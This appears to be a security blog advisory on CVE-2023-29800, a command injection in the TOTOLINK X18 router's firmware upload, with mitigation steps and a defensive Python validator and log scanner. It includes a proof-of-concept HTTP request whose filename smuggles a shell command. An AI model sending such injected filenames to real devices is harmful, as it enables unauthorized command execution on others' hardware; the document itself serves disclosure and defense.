TOTOLINK X18 V9.1.cu.2024_B20220329 is a popular wireless networking device that is widely used by businesses and consumers. Recently, a critical command injection vulnerability, CVE-2023-29800, was discovered in the device. It allows attackers to execute arbitrary commands on the target system through the FileName parameter of the UploadFirmwareFile function.

In this long-read post, we will delve into the details of the vulnerability, how it can be exploited, and what you can do to prevent and mitigate the risk associated with this vulnerability.

Vulnerability Details

The vulnerability in TOTOLINK X18 V9.1.cu.2024_B20220329 was discovered by security researchers who found that the FileName parameter in the UploadFirmwareFile function was not properly sanitized. This allows attackers to inject malicious commands through the FileName parameter, leading to a command injection vulnerability.

The following code snippet illustrates the vulnerable UploadFirmwareFile function:

function UploadFirmwareFile($filename) {
    //...
    // $filename is taken directly from the FileName form field without sanitization
    $command = "tar zxvf " . $filename . " -C /tmp/firmware";
    // the shell treats ';' inside $filename as a command separator
    system($command);
    //...
}

As you can see, the system call uses the unsanitized $filename user input, allowing an attacker to execute arbitrary commands by exploiting the FileName parameter.

Exploit Details and Proof of Concept

An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable device, inserting malicious commands through the FileName parameter. Here is a sample proof of concept:

POST /cgi-bin/firmwareUpload.cgi HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------157501700685107278671

-----------------------------157501700685107278671
Content-Disposition: form-data; name="file"; filename="test; touch /tmp/hacked;.tar.gz"
Content-Type: application/x-tar

...binary data...

-----------------------------157501700685107278671--

In this example, a file named test; touch /tmp/hacked;.tar.gz is supplied as the FileName payload. When the vulnerable function processes this payload, the shell executes the touch /tmp/hacked command, creating a new file named hacked in the /tmp directory.

Original References

- CVE-2023-29800
- Security Advisory for TOTOLINK X18

Mitigation and Prevention

To mitigate and prevent the exploitation of this vulnerability, device owners and administrators are advised to:

1. Apply the latest firmware patch provided by TOTOLINK, which addresses the CVE-2023-29800 vulnerability. The update can be downloaded from the official TOTOLINK website.
2. Regularly monitor and review device logs to detect and respond to any anomalies that could indicate attempted or successful exploitation.
3. Restrict access to the web user interface of the device by implementing access control lists (ACLs) and IP filtering.
4. Use strong authentication mechanisms, such as complex passwords, to strengthen the security of the TOTOLINK X18 devices.
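The following Python example is added here and is not code from the TOTOLINK firmware or from the original post. It shows the defensive counterpart to the snippet in the Vulnerability Details section (a strict filename allowlist and a shell-free tar invocation) and, for mitigation step 2, a small log check that flags upload names containing shell metacharacters. The allowlist pattern, the argv shape and the log line format are assumptions of this example.

```python
import re
import subprocess
from typing import List, Tuple

# Allowlist for firmware image names (an assumption of this example, not the
# vendor's rule): starts with an alphanumeric, contains only letters, digits,
# '.', '_' and '-', ends in .tar.gz. Spaces, ';', '/' and other metacharacters
# can never match, so "test; touch /tmp/hacked;.tar.gz" is rejected outright.
FIRMWARE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.tar\.gz$")

# Characters that give a shell extra meaning inside an argument.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")


def validate_firmware_filename(name: str) -> bool:
    """Return True only if the upload name matches the strict allowlist."""
    return bool(FIRMWARE_NAME.fullmatch(name)) and ".." not in name


def vulnerable_command(name: str) -> str:
    """The string the page's snippet hands to system(): the filename is
    spliced into shell syntax, so ';' in it starts a second command."""
    return "tar zxvf " + name + " -C /tmp/firmware"


def safe_extract_argv(name: str, dest: str = "/tmp/firmware") -> List[str]:
    """Build an argv list for a shell-free subprocess call. The filename is a
    single argument, so shell metacharacters have no special meaning; '--'
    also stops tar from reading a leading '-' as an option."""
    if not validate_firmware_filename(name):
        raise ValueError("rejected firmware filename: %r" % name)
    return ["tar", "zxf", "--", name, "-C", dest]


def extract_firmware(name: str, dest: str = "/tmp/firmware") -> int:
    """Hardened replacement for system($command): no shell is involved."""
    return subprocess.run(safe_extract_argv(name, dest), check=False).returncode


def find_suspicious_uploads(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, filename) for upload entries whose filename holds
    shell metacharacters. The log format below is constructed for this example."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        m = re.search(r'filename="([^"]*)"', line)
        if m and SHELL_META.search(m.group(1)):
            hits.append((lineno, m.group(1)))
    return hits


SAMPLE_LOG = [  # constructed sample entries, not real device output
    'POST /cgi-bin/firmwareUpload.cgi filename="X18_V9.1.cu.2024_B20220329.tar.gz"',
    'POST /cgi-bin/firmwareUpload.cgi filename="test; touch /tmp/hacked;.tar.gz"',
]
```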

Conclusion

CVE-2023-29800 is a critical command injection vulnerability in TOTOLINK X18 V9.1.cu.2024_B20220329. By exploiting this vulnerability, attackers can execute arbitrary commands on the target system, potentially leading to severe consequences such as unauthorized access or control, sensitive data exfiltration, or even complete compromise of the device. It is crucial to apply the appropriate mitigation and prevention strategies to reduce the risk associated with this vulnerability.

Timeline

Published on: 04/14/2023 14:15:00 UTC
Last modified on: 04/21/2023 18:31:00 UTC